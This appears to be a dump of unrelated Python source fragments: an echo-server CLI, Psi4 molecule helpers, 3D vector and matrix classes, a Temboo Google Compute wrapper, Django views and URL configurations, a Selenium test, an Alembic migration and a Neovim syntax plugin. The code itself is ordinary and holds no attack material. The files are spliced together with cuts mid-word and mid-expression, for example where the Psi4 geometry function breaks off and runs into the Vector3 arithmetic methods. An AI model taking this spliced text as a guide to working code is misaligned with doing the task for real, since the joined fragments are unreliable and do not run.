"""Command line interface for echo server.""" import fnmatch import asyncio import argparse from aioconsole import AsynchronousCli, start_interactive_server from aioconsole.server import parse_server, print_server from . import echo async def get_history(reader, writer, pattern=None): history = asyncio.get_event_loop().history if not history: return "No message in the history" if pattern: history = {host: history[host] for host in fnmatch.filter(history, pattern)} if not history: return "No host match the given pattern" for host in history: writer.write(f"Host {host}:\n".encode()) for i, message in enumerate(history[host]): writer.write(f" {i}. {message}\n".encode()) def make_cli(streams=None): parser = argparse.ArgumentParser(description="Display the message history") parser.add_argument("--pattern", "-p", type=str, help="pattern to filter hostnames") commands = {"history": (get_history, parser)} return AsynchronousCli(commands, streams, prog="echo") def parse_args(args=None): parser = argparse.ArgumentParser( description="Run the echo server and a command line interface." ) parser.add_argument( "server", metavar="[HOST:]PORT", type=str, help="interface for the echo server, default host is localhost", ) parser.add_argument( "--serve-cli", metavar="[HOST:]PORT", type=str, help="serve the command line interface on the given host+port " "instead of using the standard streams", ) namespace = parser.parse_args(args) host, port = parse_server(namespace.server, parser) if namespace.serve_cli is not None: serve_cli = parse_server(namespace.serve_cli, parser) else:
serve_cli = None return host, port, serve_cli def main(args=None): host, port, serve_cli = parse_args(args) if serve_cli: cli_host, cli_port = serve_cli coro = start_interactive_server(make_cli, cli_host, cli_port) server = asyncio.get_event_loop().run_until_complete(coro) print_server(server, "command line interface") else: asyncio.ensure_future(make_cli().interact
()) return echo.run(host, port) if __name__ == "__main__": main()
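# Illustrative usage sketch (not part of the original module): a tiny client for
# exercising the echo server started by main() above. It assumes the server
# echoes each line back verbatim; the host and port below are placeholders.
async def _demo_echo_once(message, host="localhost", port=8000):
    reader, writer = await asyncio.open_connection(host, port)
    writer.write(message.encode() + b"\n")
    await writer.drain()
    reply = await reader.readline()  # the echoed line comes straight back
    writer.close()
    return reply.decode()

# Example: asyncio.get_event_loop().run_until_complete(_demo_echo_once("hello"))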
U Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License along # with Psi4; if not, write to the Free Software Found
ation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. # # @END LICENSE # """Module with utility functions that act on molecule objects.""" from typing import Dict, Tuple, Union import numpy as np import qcelemental as qcel from psi4 import core from psi4.driver.p4util import temp_circular_import_blocker from psi4.driver import qcdb from psi4.driver.p4util.exce
ptions import * def molecule_set_attr(self, name, value): """Function to redefine __setattr__ method of molecule class.""" fxn = object.__getattribute__(self, "is_variable") isvar = fxn(name) if isvar: fxn = object.__getattribute__(self, "set_variable") fxn(name, value) return object.__setattr__(self, name, value) def molecule_get_attr(self, name): """Function to redefine __getattr__ method of molecule class.""" fxn = object.__getattribute__(self, "is_variable") isvar = fxn(name) if isvar: fxn = object.__getattribute__(self, "get_variable") return fxn(name) return object.__getattribute__(self, name) @classmethod def _molecule_from_string(cls, molstr, dtype=None, name=None, fix_com=None, fix_orientation=None, fix_symmetry=None, return_dict=False, enable_qm=True, enable_efp=True, missing_enabled_return_qm='none', missing_enabled_return_efp='none', verbose=1): molrec = qcel.molparse.from_string( molstr=molstr, dtype=dtype, name=name, fix_com=fix_com, fix_orientation=fix_orientation, fix_symmetry=fix_symmetry, return_processed=False, enable_qm=enable_qm, enable_efp=enable_efp, missing_enabled_return_qm=missing_enabled_return_qm, missing_enabled_return_efp=missing_enabled_return_efp, verbose=verbose) if return_dict: return core.Molecule.from_dict(molrec['qm']), molrec else: return core.Molecule.from_dict(molrec['qm']) @classmethod def _molecule_from_arrays(cls, geom=None, elea=None, elez=None, elem=None, mass=None, real=None, elbl=None, name=None, units='Angstrom', input_units_to_au=None, fix_com=None, fix_orientation=None, fix_symmetry=None, fragment_separators=None, fragment_charges=None, fragment_multiplicities=None, molecular_charge=None, molecular_multiplicity=None, comment=None, provenance=None, connectivity=None, missing_enabled_return='error', tooclose=0.1, zero_ghost_fragments=False, nonphysical=False, mtol=1.e-3, verbose=1, return_dict=False): """Construct Molecule from unvalidated arrays and variables. Light wrapper around :py:func:`~qcelemental.molparse.from_arrays` that is a full-featured constructor to dictionary representa- tion of Molecule. This follows one step further to return Molecule instance. Parameters ---------- See :py:func:`~qcelemental.molparse.from_arrays`. Returns ------- :py:class:`psi4.core.Molecule` """ molrec = qcel.molparse.from_arrays( geom=geom, elea=elea, elez=elez, elem=elem, mass=mass, real=real, elbl=elbl, name=name, units=units, input_units_to_au=input_units_to_au, fix_com=fix_com, fix_orientation=fix_orientation, fix_symmetry=fix_symmetry, fragment_separators=fragment_separators, fragment_charges=fragment_charges, fragment_multiplicities=fragment_multiplicities, molecular_charge=molecular_charge, molecular_multiplicity=molecular_multiplicity, comment=comment, provenance=provenance, connectivity=connectivity, domain='qm', missing_enabled_return=missing_enabled_return, tooclose=tooclose, zero_ghost_fragments=zero_ghost_fragments, nonphysical=nonphysical, mtol=mtol, verbose=verbose) if return_dict: return core.Molecule.from_dict(molrec), molrec else: return core.Molecule.from_dict(molrec) @classmethod def _molecule_from_schema(cls, molschema: Dict, return_dict: bool = False, nonphysical: bool = False, verbose: int = 1) -> Union[core.Molecule, Tuple[core.Molecule, Dict]]: """Construct Molecule from non-Psi4 schema. Light wrapper around :py:func:`~psi4.core.Molecule.from_arrays`. Parameters ---------- molschema Dictionary form of Molecule following known schema. return_dict Additionally return Molecule dictionary intermediate. 
nonphysical Do allow masses outside an element's natural range to pass validation? verbose Amount of printing. Returns ------- mol : :py:class:`psi4.core.Molecule` molrec : dict Dictionary representation of instance. Only provided if `return_dict` is True. """ molrec = qcel.molparse.from_schema(molschema, nonphysical=nonphysical, verbose=verbose) qmol = core.Molecule.from_dict(molrec) geom = np.array(molrec["geom"]).reshape((-1, 3)) qmol._initial_cartesian = core.Matrix.from_array(geom) if return_dict: return qmol, molrec else: return qmol def dynamic_variable_bind(cls): """Function to dynamically add extra members to the core.Molecule class. """ cls.__setattr__ = molecule_set_attr cls.__getattr__ = molecule_get_attr cls.to_arrays = qcdb.Molecule.to_arrays cls.to_dict = qcdb.Molecule.to_dict cls.BFS = qcdb.Molecule.BFS cls.B787 = qcdb.Molecule.B787 cls.scramble = qcdb.Molecule.scramble cls.from_arrays = _molecule_from_arrays cls.from_string = _molecule_from_string cls.to_string = qcdb.Molecule.to_string cls.from_schema = _molecule_from_schema cls.to_schema = qcdb.Molecule.to_schema cls.run_dftd3 = qcdb.Molecule.run_dftd3 cls.run_dftd4 = qcdb.Molecule.run_dftd4 cls.run_gcp = qcdb.Molecule.run_gcp cls.format_molecule_for_mol = qcdb.Molecule.format_molecule_for_mol dynamic_variable_bind(core.Molecule) # pass class type, not class instance # # Define geometry to be used by PSI4. # The molecule created by this will be set in options. # # geometry(" # O 1.0 0.0 0.0 # H 0.0 1.0 0.0 # H 0.0 0.0 0.0 # def geometry(geom, name="default"): """Function to create a molecule object of name *name* from the geometry in string *geom*. Permitted for user use but deprecated in driver in favor of explicit molecule-passing. Comments within the string are filtered. """ molrec = qcel.molparse.from_string( geom, enable_qm=True, missing_enabled_return_qm='minimal', enable_efp=True, missing_enabled_return_efp='none') molecule = core.Molecule.from_dict(molrec['qm']) if "geom" in molrec["qm"]: geom = np.array(molrec["qm"]["geom"]).reshape((-1, 3)) if molrec["qm"]["units"] == "Angstrom": geom = geom / qcel.constants.bohr2angstroms molecule._initial_cartesian = core.Matrix.from_array(geom) molecule.set_name(name) if 'efp' in mol
: return Vector3(self.x + v.x, self.y + v.y, self.z + v.z) __radd__ = __add__ def __sub__(self, v): return Vector3(self.x - v.x, self.y - v.y, self.z - v.z) def __neg__(self): return Vector3(-self.x, -self.y, -self.z) def __rsub__(self, v): return Vector3(v.x - self.x, v.y - self.y, v.z - self.z) def __mul__(self, v): if isinstance(v, Vector3): '''dot product''' return self.x*v.x + self.y*v.y + self.z*v.z return Vector3(self.x * v, self.y * v, self.z * v) __rmul__ = __mul__ def __div__(self, v): return Vector3(self.x / v, self.y / v, self.z / v) def __mod__(self, v): '''cross product''' return Vector3(self.y*v.z - self.z*v.y, self.z*v.x - self.x*v.z, self.x*v.y - self.y*v.x) def __copy__(self): return Vector3(self.x, self.y, self.z) copy = __copy__ def length(self): return sqrt(self.x**2 + self.y**2 + self.z**2) def zero(self): self.x = self.y = self.z = 0 def angle(self, v): '''return the angle between this vector and another vector''' return acos((self * v) / (self.length() * v.length())) def normalized(self): return self.__div__(self.length()) def normalize(self): v = self.normalized() self.x = v.x self.y = v.y self.z = v.z class Matrix3: '''a 3x3 matrix, intended as a rotation matrix''' def __init__(self, a=None, b=None, c=None): if a is not None and b is not None and c is not None: self.a = a.copy() self.b = b.copy() self.c = c.copy() else: self.identity() def __repr__(self): return 'Matrix3((%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f), (%.2f, %.2f, %.2f))' % ( self.a.x, self.a.y, self.a.z, self.b.x, self.b.y, self.b.z, self.c.x, self.c.y, self.c.z) def identity(self): self.a = Vector3(1,0,0) self.b = Vector3(0,1,0) self.c = Vector3(0,0,1) def transposed(self): return Matrix3(Vector3(self.a.x, self.b.x, self.c.x), Vector3(self.a.y, self.b.y, self.c.y), Vector3(self.a.z, self.b.z, self.c.z)) def from_euler(self, roll, pitch, yaw): '''fill the matrix from Euler angles in radians''' cp = cos(pitch) sp = sin(pitch) sr = sin(roll) cr = cos(roll) sy = sin(yaw) cy = cos(yaw) self.a.x = cp * cy self.a.y = (sr * sp * cy) - (cr * sy) self.a.z = (cr * sp * cy) + (sr * sy) self.b.x = cp * sy self.b.y = (sr * sp * sy) + (cr * cy) self.b.z = (cr * sp * sy) - (sr * cy) self.c.x = -sp self.c.y = sr * cp self.c.z = cr * cp def to_euler(self): '''find Euler angles for the matrix''' if self.c.x >= 1.0: pitch = pi elif self.c.x <= -1.0: pitch = -pi else: pitch = -asin(self.c.x) roll = atan2(self.c.y, self.c.z) yaw = atan2(self.b.x, self.a.x) return (roll, pitch, yaw) def __add__(self, m): return Matrix3(self.a + m.a, self.b + m.b, self.c + m.c) __radd__ = __add__ def __sub__(self, m): return Matrix3(self.a - m.a, self.b - m.b, self.c - m.c) def __rsub__(self, m): return Matrix3(m.a - self.a, m.b - self.b, m.c - self.c) def __mul__(self, other): if isinstance(other, Vector3): v = other return Vector3(self.a.x * v.x + self.a.y * v.y + self.a.z * v.z, self.b.x * v.x + self.b.y * v.y + self.b.z * v.z, self.c.x * v.x + self.c.y * v.y + self.c.z * v.z) elif isinstance(other, Matrix3): m = other return Matrix3(Vector3(self.a.x * m.a.x + self.a.y * m.b.x + self.a.z * m.c.x, self.a.x * m.a.y + self.a.y * m.b.y + self.a.z * m.c.y, self.a.x * m.a.z + self.a.y * m.b.z + self.a.z * m.c.z), Vector3(self.b.x * m.a.x + self.b.y * m.b.x + self.b.z * m.c.x, self.b.x * m.a.y + self.b.y * m.b.y + self.b.z * m.c.y, self.b.x * m.a.z + self.b.y * m.b.z + self.b.z * m.c.z), Vector3(self.c.x * m.a.x + self.c.y * m.b.x + self.c.z * m.c.x, self.c.x * m.a.y + self.c.y * m.b.y + self.c.z * m.c.y, self.c.x * m.a.z + self.c.y * m.b.z + 
self.c.z * m.c.z)) v = other return Matrix3(self.a * v, self.b * v, self.c * v) def __div__(self, v): return Matrix3(self.a / v, self.b / v, self.c / v) def __neg__(self): return Matrix3(-self.a, -self.b, -self.c) def __copy__(self): return Matrix3(self.a, self.b, self.c) copy = __copy__ def rotate(self, g): '''rotate the matrix by a given amount on 3 axes''' temp_matrix = Matrix3() a = self.a b = self.b c = self.c temp_matrix.a.x = a.y * g.z - a.z * g.y temp_matrix.a.y = a.z * g.x - a.x * g.z temp_matrix.a.z = a.x * g.y - a.y * g.x temp_matrix.b.x = b.y * g.z - b.z * g.y temp_matrix.b.y = b.z * g.x - b.x * g.z temp_matrix.b.z = b.x * g.y - b.y * g.x temp_matrix.c.x = c.y * g.z - c.z * g.y temp_matrix.c.y = c.z
* g.x - c.x * g.z temp_matrix.c.z = c.x * g.y - c.y * g.x self.a += temp_matrix.a self.b += temp_matrix.b self.c += temp_matrix.c def normalize(self): '''re-normalise a rotation matrix''' error = self.a * self.b t0 = self.a - (self.b * (0.5 * error)) t1 = self.b - (self.a * (0.5 * error)) t2 = t0 % t1 self.a = t0
* (1.0 / t0.length()) self.b = t1 * (1.0 / t1.length()) self.c = t2 * (1.0 / t2.length()) def trace(self): '''the trace of the matrix''' return self.a.x + self.b.y + self.c.z def from_axis_angle(self, axis, angle): '''create a rotation matrix from axis and angle''' ux = axis.x uy = axis.y uz = axis.z ct = cos(angle) st = sin(angle) self.a.x = ct + (1-ct) * ux**2 self.a.y = ux*uy*(1-ct) - uz*st self.a.z = ux*uz*(1-ct) + uy*st self.b.x = uy*ux*(1-ct) + uz*st self.b.y = ct + (1-ct) * uy**2 self.b.z = uy*uz*(1-ct) - ux*st self.c.x = uz*ux*(1-ct) - uy*st self.c.y = uz*uy*(1-ct) + ux*st self.c.z = ct + (1-ct) * uz**2 def from_two_vectors(self, vec1, vec2): '''get a rotation matrix from two vectors. This returns a rotation matrix which when applied to vec1 will produce a vector pointing in the same direction as vec2''' angle = vec1.angle(vec2) cross = vec1 % vec2 if cross.length() == 0: # the two vectors are colinear return self.from_euler(0,0,angle) cross.normalize() return self.from_axis_angle(cross, angle) class Plane: '''a plane in 3 space, defined by a point and a vector normal''' def __init__(self, point=None, normal=None): if point is None: point = Vector3(0,0,0) if normal is None: normal = Vector3(0, 0, 1) self.point = point self.normal = normal class Line: '''a line in 3 space, defined by a point and a vector''' def __init__(self, point=None, vector=None): if point is None: point = Vector3(0,0,0) if vector is None: vector = Vector3(0, 0, 1) self.point = point self.vector = vector def plane
# -*- coding: utf-8 -*- ############################################################################### # # GetInstance # Retrieves information about the specified Instance. # # Python versions 2.6, 2.7, 3.x # # Copyright 2014, Temboo Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, # either express or implied. See the License for the specific # language governing permissions and limitations under the License. # # ############################################################################### from temboo.core.choreography import Choreogr
aphy from temboo.core.choreography import InputSet from temboo.core.choreography import ResultSet from temboo.core.choreography import Ch
oreographyExecution import json class GetInstance(Choreography): def __init__(self, temboo_session): """ Create a new instance of the GetInstance Choreo. A TembooSession object, containing a valid set of Temboo credentials, must be supplied. """ super(GetInstance, self).__init__(temboo_session, '/Library/Google/ComputeEngine/Instances/GetInstance') def new_input_set(self): return GetInstanceInputSet() def _make_result_set(self, result, path): return GetInstanceResultSet(result, path) def _make_execution(self, session, exec_id, path): return GetInstanceChoreographyExecution(session, exec_id, path) class GetInstanceInputSet(InputSet): """ An InputSet with methods appropriate for specifying the inputs to the GetInstance Choreo. The InputSet object is used to specify input parameters when executing this Choreo. """ def set_AccessToken(self, value): """ Set the value of the AccessToken input for this Choreo. ((optional, string) A valid access token retrieved during the OAuth process. This is required unless you provide the ClientID, ClientSecret, and RefreshToken to generate a new access token.) """ super(GetInstanceInputSet, self)._set_input('AccessToken', value) def set_ClientID(self, value): """ Set the value of the ClientID input for this Choreo. ((conditional, string) The Client ID provided by Google. Required unless providing a valid AccessToken.) """ super(GetInstanceInputSet, self)._set_input('ClientID', value) def set_ClientSecret(self, value): """ Set the value of the ClientSecret input for this Choreo. ((conditional, string) The Client Secret provided by Google. Required unless providing a valid AccessToken.) """ super(GetInstanceInputSet, self)._set_input('ClientSecret', value) def set_Fields(self, value): """ Set the value of the Fields input for this Choreo. ((optional, string) Comma-seperated list of fields you want to include in the response.) """ super(GetInstanceInputSet, self)._set_input('Fields', value) def set_Instance(self, value): """ Set the value of the Instance input for this Choreo. ((required, string) The name of the instance to retrieve.) """ super(GetInstanceInputSet, self)._set_input('Instance', value) def set_Project(self, value): """ Set the value of the Project input for this Choreo. ((required, string) The ID of a Google Compute project.) """ super(GetInstanceInputSet, self)._set_input('Project', value) def set_RefreshToken(self, value): """ Set the value of the RefreshToken input for this Choreo. ((conditional, string) An OAuth refresh token used to generate a new access token when the original token is expired. Required unless providing a valid AccessToken.) """ super(GetInstanceInputSet, self)._set_input('RefreshToken', value) def set_Zone(self, value): """ Set the value of the Zone input for this Choreo. ((required, string) The name of the zone associated with this request.) """ super(GetInstanceInputSet, self)._set_input('Zone', value) class GetInstanceResultSet(ResultSet): """ A ResultSet with methods tailored to the values returned by the GetInstance Choreo. The ResultSet object is used to retrieve the results of a Choreo execution. """ def getJSONFromString(self, str): return json.loads(str) def get_Response(self): """ Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Google.) """ return self._output.get('Response', None) def get_NewAccessToken(self): """ Retrieve the value for the "NewAccessToken" output from this Choreo execution. ((string) Contains a new AccessToken when the RefreshToken is provided.) 
""" return self._output.get('NewAccessToken', None) class GetInstanceChoreographyExecution(ChoreographyExecution): def _make_result_set(self, response, path): return GetInstanceResultSet(response, path)
# -*- coding: utf-8 -*-

# crunchyfrog - a database schema browser and query tool
# Copyright (C) 2008 Andi Albrecht <albrecht.andi@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""Configuration"""

import gobject

from os.path import abspath, dirname, join

from configobj import ConfigObj

from gettext import gettext as _

import logging
log = logging.getLogger("CONFIG")


class Config(gobject.GObject):
    """Configuration object

    An instance of this class is accessible through the ``config``
    attribute of a `CFApplication`_ instance.

    The Config class is a simplified wrapper around a ConfigObj instance.
    It merges a default configuration, shipped as package data in this
    package, with a user configuration. The ``-c`` command line switch
    determines which user configuration file is used; if it is not set, it
    defaults to ``~/.config/crunchyfrog/config``.

    This wrapper provides only a getter and a setter for configuration
    values and expects that option names are dotted strings (but only by
    convention). Values can be any basic Python type since it uses
    ConfigObj's ``unrepr`` mode (read the `ConfigObj documentation`_ for
    details).

    Plugins can connect to the `changed` signal to track configuration
    changes; for example, the SQL editor uses this signal to reflect
    changes made through the preference dialog.

    .. Note:: The runtime Config instance (``app.config``) is bound to the
        application, so it is not possible to store instance-specific data
        here.

    :Usage example:

    .. sourcecode:: python

        >>> app.config.get("foo.bar")  # Not set yet, None is default
        None
        >>> app.config.set("foo.bar", True)
        >>> app.config.get("foo.bar")
        True
        >>> app.config.set("foo.bar", ["Completely", "different"])  # No type check!
        >>> print " ".join(app.config.get("foo.bar"))
        Completely different

    :Signals:

    changed
        ``def callback(config, key, value, user_param1, ...)``
        Emitted when an option has changed.

    .. _CFApplication: cf.app.CFApplication.html
    .. _ConfigObj documentation: http://www.voidspace.org.uk/python/configobj.html#unrepr-mode
    """

    __gsignals__ = {
        "changed": (gobject.SIGNAL_RUN_LAST,
                    gobject.TYPE_NONE,
                    (str, gobject.TYPE_PYOBJECT)),
    }

    def __init__(self, app, config_file):
        """
        The constructor of this class takes two arguments:

        :Parameter:
            app
                `CFApplication`_ instance
            config_file
                Path to user configuration file

        .. _CFApplication: cf.app.CFApplication.html
        """
        self.app = app
        self.__gobject_init__()  # IGNORE:E1101
        self.__conf = None
        self.__config_file = config_file
        self.__init_conf()
        self.app.register_shutdown_task(self.on_app_shutdown,
                                        _(u"Writing configuration"))

    def on_app_shutdown(self, *args):  # IGNORE:W0613
        """Callback: write configuration file to disk"""
        self.write()

    def __init_conf(self):
        """Initialize the configuration system"""
        self.__conf = ConfigObj(abspath(join(dirname(__file__), "default.cfg")),
                                unrepr=True)
        log.info("Loading configuration file %r" % self.__config_file)
        self.__conf.update(ConfigObj(self.__config_file, unrepr=True))

    def init(self):
        """Loads configuration"""
        pass

    def get(self, key, default=None):
        """Returns value or default for key"""
        return self.__conf.get(key, default)

    def set(self, key, value):
        """Sets key to value"""
        self.__conf[key] = value
        self.emit("changed", key, value)  # IGNORE:E1101

    def write(self, fname=None):
        """Writes configuration file"""
        if not fname:
            fname = self.__config_file
        fp = open(fname, "w")
        self.__conf.write(fp)
        fp.close()
#!/usr/bin/env python
from __future__ import print_function
import sys
import numpy
import pni.io.nx.h5 as nexus

f = nexus.create_file("test_string2.nxs", True)
d = f.root().create_group("scan_1", "NXentry").\
    create_group("detector", "NXdetector")

sa = d.create_field("ListofStrings", "string", shape=(3, 2))
sa[0, 0] = "safdfdsffdsfd"
sa[1, 0] = "safdsfsfdsffdsfd"
sa[2, 0] = "safdfsfd"

print(sa[0, 0])
print(sa[1, 0])
print(sa[2, 0])
print(sa[...])

f.close()
"""Drafts as required folder Revision ID: 41a7e825d108 Revises: 269247bc37d3 Create Date: 2014-0
3-13 21:14:25.652333 """ # revision identifiers, used by Alembic. revision = '41a7e825d108' down_revision = '269247bc37d3' from alembic import op import sqlalchemy as sa def upgrade(): op.add_column('imapaccount', sa.Column('drafts_folder_name', sa.String(255),
nullable=True)) def downgrade(): op.drop_column('imapaccount', 'drafts_folder_name')
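# Illustrative sketch (not part of the migration itself): this revision can also
# be applied or rolled back programmatically through Alembic's command API. The
# "alembic.ini" path is an assumption about the project layout.
from alembic import command
from alembic.config import Config as AlembicConfig

def apply_drafts_folder_migration(ini_path="alembic.ini"):
    cfg = AlembicConfig(ini_path)
    command.upgrade(cfg, "41a7e825d108")       # runs upgrade() above
    # command.downgrade(cfg, "269247bc37d3")   # would undo it via downgrade()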
#!/usr/bin/python
#
# Copyright 2008-2010 WebDriver committers
# Copyright 2008-2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from selenium import webdriver
from selenium.test.selenium.webdriver.common import api_examples
from selenium.test.selenium.webdriver.common.webserver import SimpleWebServer


def setup_module(module):
    webserver = SimpleWebServer()
    webserver.start()
    FirefoxApiExampleTest.webserver = webserver
    FirefoxApiExampleTest.driver = webdriver.Firefox()


class FirefoxApiExampleTest(api_examples.ApiExampleTest):
    pass


def teardown_module(module):
    FirefoxApiExampleTest.driver.quit()
    FirefoxApiExampleTest.webserver.stop()
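# Illustrative sketch (not part of the test suite above): the same round trip
# driven directly with the public WebDriver API, without the shared test
# harness. The URL is a placeholder for whatever page SimpleWebServer serves.
def demo_firefox_roundtrip(url="http://localhost:8000/"):
    driver = webdriver.Firefox()   # start a browser session
    try:
        driver.get(url)            # load a page, as the API examples do
        return driver.title        # read something back from the page
    finally:
        driver.quit()              # always tear the session down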
from application import app as application
from gevent import monkey
from socketio.server import SocketIOServer

monkey.patch_all()

if __name__ == '__main__':
    # The original call was `socketio.run(application)`, but no `socketio` name
    # is imported here; serve the app with the SocketIOServer imported above,
    # as the previously commented-out code intended.
    SocketIOServer(
        ('', application.config['PORT']),
        application,
        resource="socket.io").serve_forever()
# browsershots.org - Test your web design in different browsers
# Copyright (C) 2007 Johann C. Rocholl <johann@browsershots.org>
#
# Browsershots is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# Browsershots is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.

"""
URL configuration for the accounts app.
"""

__revision__ = "$Rev: 2160 $"
__date__ = "$Date: 2007-09-18 19:12:50 -0400 (Tue, 18 Sep 2007) $"
__author__ = "$Author: johann $"

from django.conf.urls.defaults import patterns

urlpatterns = patterns('shotserver04.accounts.views',
    (r'^login/$', 'login'),
    (r'^logout/$', 'logout'),
    (r'^profile/$', 'profile'),
    (r'^email/$', 'email'),
    (r'^verify/(?P<hashkey>[0-9a-f]{32})/$', 'verify'),
)
from django.shortcuts import render, redirect, get_object_or_404 from django.core.urlresolvers import reverse from openiv.settings import * # Create your views here. def index(request): return redirect(reverse('public:event')) # Comment the above to have an independent home page. context = { 'imagesource': 'public/images/image-1.jpg', 'activetab': 'home', 'titletext': EVENT_MEDIUM_NAME, 'text1': [ 'The ' + EVENT_ANNIVERSARY + ' AIVCF will take place in ' + EVENT_CITY + ' in ' + EVENT_YEAR + '.', 'Out of courtesy to the upcoming festivals (68th in Perth 2017, 69th in Melbourne 2018), we won’t have any news until Melbourne 2018 has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.', ], } return render(request,'public/index.html', context) def event(request): context = { 'imagesource': 'public/images/image-1.jpg', 'activetab': 'event', 'titletext': 'About ' + EVENT_MEDIUM_NAME, 'text1': [ 'Intervarsity choral festivals (IVs) have been an annual event since 1950 when the Melbourne University Choral Society travelled to Sydney to present a combined concert with the Sydney University Musical Society. IVs quickly expanded to include other university choirs and are now hosted in many cities across Australia with participation drawing from the wider choral community in Australia and occasionally overseas.', EVENT_YEAR + ' sees the ' + EVENT_ANNIVERSARY + ' IV, hosted in ' + EVENT_CITY + '
by ' + EVENT_HOSTED_BY + '. Choristers from across the country will be in ' + EVENT_CITY + ' for intensive rehearsals to produce a grand concert.', 'Out
of courtesy to the upcoming festivals (' + EVENT_UPCOMING_EVENTS + '), we won’t have any news until ' + EVENT_PRIOR_CITY + ' ' + EVENT_PRIOR_YEAR + ' has begun. Festival details will be revealed in ' + EVENT_PRIOR_YEAR + '.', ORGANISATION_SHORT_NAME + ' acknowledges that ' + EVENT_SHORT_NAME + ' is being held on the traditional lands of the ' + EVENT_ABORIGINAL_COUNTRY + ' people; we pay respect to the elders of the community and extend our recognition to their descendants.', ], 'titletext2': 'Past ' + EVENT_CITY + ' IVs' } return render(request,'public/event.html', context) def organisation(request): context = { 'imagesource': 'public/images/image-1.jpg', 'activetab': 'organisation', 'titletext': ORGANISATION_SHORT_NAME, 'text1': [ 'The ' + EVENT_ANNIVERSARY + ' Australian Intervarsity Choral Festival is presented by ' + ORGANISATION_SHORT_NAME + ' in ' + EVENT_YEAR + '. The organisation was elected by the members of ' + EVENT_HOSTED_BY + '.', 'We represent the ' + EVENT_CITY + ' contingent of a wider choral community across Australia with combined membership of over a thousand nationally in the Australian Intervarsity Choral Societies Association (AICSA).', ] } return render(request,'public/index.html', context) def participate(request): context = { 'imagesource': 'public/images/image-2.jpg', 'activetab': 'participate', 'titletext': 'Participate', } return render(request,'public/participateindex.html', context) def participatefundraising(request): context = { 'imagesource': 'public/images/image-2.jpg', 'activetab': 'participate', 'titletext': 'Participate: Fundraising', } return render(request,'public/participatefundraisingindex.html', context) def help(request): context = { 'titletext': 'Help', } return render(request,'public/help.html', context) def privacy(request): context = { 'titletext': 'Privacy policy', } return render(request,'public/help.html', context) def privacyaffiliates(request): context = { 'titletext': 'Affiliates', } return render(request,'public/help.html', context) def conduct(request): context = { 'titletext': 'Code of conduct', } return render(request,'public/help.html', context)
ly wrong import pygments import pygments.lexers import pygments.token @neovim.plugin class Neosyntax(object): def __init__(self, nvim): self.nvim = nvim # swap src_ids. from brefdl: allocate two ids, and swap, adding before clearing, so things that don't change won't appear to flicker self.srcset = True self.pygmap = {} t = pygments.token self.pygmap[t.Comment.Hashbang] = "Comment" self.pygmap[t.Comment.Single] = "Comment" self.pygmap[t.Comment] = "Comment" # older versions of pygments don't have Single and Hashbang? self.pygmap[t.Keyword.Namespace] = "Include" self.pygmap[t.Keyword] = "Conditional" self.pygmap[t.Literal.Number.Integer] = "Number" self.pygmap[t.Literal.String.Double] = "String" self.pygmap[t.Literal.String.Single] = "String" self.pygmap[t.Literal.String] = "String" # same comment as above self.pygmap[t.Name.Builtin.Pseudo] = "Boolean" self.pygmap[t.Name.Builtin] = "Function" self.pygmap[t.Name.Decorator] = "PreProc" self.pygmap[t.Operator.Word] = "Conditional" def msg(self, m): self.nvim.command("echom '" + str(m) + "'") @neovim.autocmd('BufEnter', pattern='*', eval='expand("<abuf>")', sync=False) def autocmd_handler1(self, bufnr): # TODO how to pass in multiple arguments? self.highlight_buffer(int(bufnr)) @neovim.autocmd('TextChanged', pattern='*', eval='expand("<abuf>")', sync=False) def autocmd_handler2(self, bufnr): self.highlight_buffer(int(bufnr)) @neovim.autocmd('TextChangedI', pattern='*', eval='expand("<abuf>")', sync=False) def autocmd_handler3(self, bufnr): # TODO do special thing here if the user is currently typing inside a string or comment # to extend that highlight group a bunch of columns ahead # not sure where the best place to implement that will be # TODO I was hoping that performance with syntax highlighting being done by this autocmd # would be comparable to plain old :syntax off and without this plugin # I think it is better, although I'll have to find a way to test that empirically # But, it still isn't as good as I hoped. Some flickering is still present # This may be a limitation of the tui and its ability to process remote api calls # Maybe this will work better in the eventual gui? # If nothing else, this function gives the option to have syntax highlighting turned off during # insert mode, then handled once you leave insert mode. Just have to remove the TextChangedI autocmd # and keep the TextChanged one (no I). # This is less than ideal for lots of situations, but is better than nothing # TODO figure out a way to queue these calls somehow? with the swapping src_id strategy, # flicker is gone when typing fast in insert mode, but typing too fast can still cause a # call backlog that can either crash the python host or just appear as lots of lag to the user # a timer? when this is called, start a timer that counts down from X seconds # throw away and subsequent calls that come in before the tmier is up # maybe highlight_buffer should take lines as an argument to facilitate the viewport shit? self.highlight_buffer(int(bufnr)) @neovim.function('UnHighlightBuffer', sync=False) def unhighlight_buffer(self, bufnr): bufnr = int(bufnr) 